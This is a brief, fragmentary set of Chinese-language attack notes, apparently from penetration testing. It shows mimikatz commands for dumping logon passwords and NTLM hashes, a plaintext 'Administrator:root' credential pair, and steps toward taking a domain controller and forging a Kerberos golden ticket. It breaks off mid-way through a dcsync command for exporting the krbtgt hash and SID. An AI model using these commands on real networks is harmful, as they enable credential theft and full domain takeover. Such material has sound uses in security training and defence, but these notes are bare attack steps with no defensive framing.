本 privilege::debug
sekurlsa::logonpasswords
NTLM哈希
远程登录
root
账户密码Administrator:root
查询域内信息
获得域控
伪造*金票据
第一步:在域控内导出krbtgt用户的hash和sid(使用mimikatz.exe工具):
lsadump::dcsync/domain:test.